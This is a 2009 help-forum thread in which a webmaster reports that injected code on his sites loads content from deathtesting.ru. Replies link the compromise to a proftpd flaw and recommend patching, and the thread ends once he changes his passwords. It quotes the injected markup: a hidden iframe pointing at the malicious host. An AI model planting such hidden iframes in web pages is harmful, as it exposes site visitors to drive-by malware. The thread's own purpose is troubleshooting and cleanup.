943,805 Members | Top Members by Rank

Hardware and Software > Microsoft Windows > Viruses, Spyware and other Nasties > deathtesting.ru
Ad:
Permalink
Sep 28th, 2009
-1

deathtesting.ru

Expand Post »
Not sure if this is in the right place but anyway........

A load of sites i help maintain have been having code added to them.

<div style="display:none"><iframe width=438 height=168 src="http://deathtesting.  ru:8080/index.php" ></iframe></div>

normally with a load of random divs as well.

I have found out from a random lLithuanian site that this is a proftpd service vulnerability.

Google has flagged the sites and is displaying warnings that our site may contain malware.

Any ideas how to get rid of it?

We are currently changing our FTP and control panel codes and i will get rid of the code and reupload again and see if that works but is there anything else that can be done?

The sites are hosted on 1&1 if that makes any difference.




Have tried removing the code and re-uploading.
Reputation Points: 10
Solved Threads: 0
Junior Poster
kained is offline Offline
126 posts
since May 2004
Permalink
Sep 30th, 2009
0

Re: deathtesting.ru

Until you can verify that the proftpd application has been patched you should disable it. The Fedora update for proftpd was published on the 24th. It may already be in place on your hosting service.
Reputation Points: 11
Solved Threads: 2
Newbie Poster
BrianDSy is offline Offline
9 posts
since Jul 2009
Permalink
Sep 30th, 2009
0

Re: deathtesting.ru

Thinks is okay now, just changed the FTP and control panel codes and reuploaded everything and it seems to be fine.
Reputation Points: 10
Solved Threads: 0
Junior Poster
kained is offline Offline
126 posts
since May 2004
Permalink
Sep 30th, 2009
0

Re: deathtesting.ru

When you say you changed the FTP and control panel codes I am not sure what you mean. Did you mean you changed the passwords?
Reputation Points: 11
Solved Threads: 2
Newbie Poster
BrianDSy is offline Offline
9 posts
since Jul 2009
Permalink
Oct 1st, 2009
0

Re: deathtesting.ru

yes
Reputation Points: 10
Solved Threads: 0
Junior Poster
kained is offline Offline
126 posts
since May 2004

This thread is solved

Either the thread starter or a moderator has marked this thread as solved. You can most likely trust the responses and answers given. There is most likely no reason for any further responses to be posted here. If you have a related question, please start a new thread in this forum instead.

This thread is more than three months old

No one has posted to this discussion for at least three months. Please let old threads die and do not reply to them unless you feel you have something new and valuable to contribute that absolutely must be added to make the discussion complete. Otherwise, please start a new thread in this forum instead.
Message:
Previous Thread in Viruses, Spyware and other Nasties Forum Timeline: Installing symantec end point protection
Next Thread in Viruses, Spyware and other Nasties Forum Timeline: MBAM False positive - Avast skin chooser





About Us | Contact Us | Advertise | Acceptable Use Policy
Forum Index | Build Custom RSS Feed


Follow us on Twitter


© 2011 DaniWeb® LLC